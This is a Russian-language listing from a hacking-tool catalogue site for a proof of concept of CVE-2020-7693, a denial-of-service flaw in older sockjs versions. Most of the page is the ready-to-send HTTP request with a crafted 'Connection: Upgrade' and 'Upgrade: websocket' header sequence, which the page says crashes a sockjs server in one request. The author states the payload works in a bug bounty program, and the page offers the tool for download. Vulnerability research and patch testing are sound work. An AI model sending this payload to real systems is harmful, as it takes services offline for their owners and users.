Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-7693 — PoC для CVE-2020-7693 (тестирование на версии sockjs@0.3.18) | Kitploit
Инструменты/GitHubGitHub/thewindghost/cve-2020-7693
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubthewindghost/cve-2020-7693

CVE-2020-7693

PoC для CVE-2020-7693 (тестирование на версии [email protected])

Репозиторий
7 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-7693 Poc

Примечание: Я подтверждаю, что пейлоад для CVE-2020-7693 может работать в программе Bug Bounty

Описание:

  • Неправильная обработка заголовка Upgrade со значением websocket приводит к падению контейнеров, на которых работают приложения sockjs. Это затрагивает пакет sockjs до версии 0.3.20.

Один запрос роняет сервер через устаревший sockjs-node:

  • Запрос
root@kitploit:~
GET /sockjs-node/000/ HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Connection: Upgrade
Upgrade: websocket
Cache-Control: no-cache
Connection: close
\r\n (delete-this)
\r\n (delete-this)

  • Ответ
изображение

На сервере:

изображение изображение
Скачать инструмент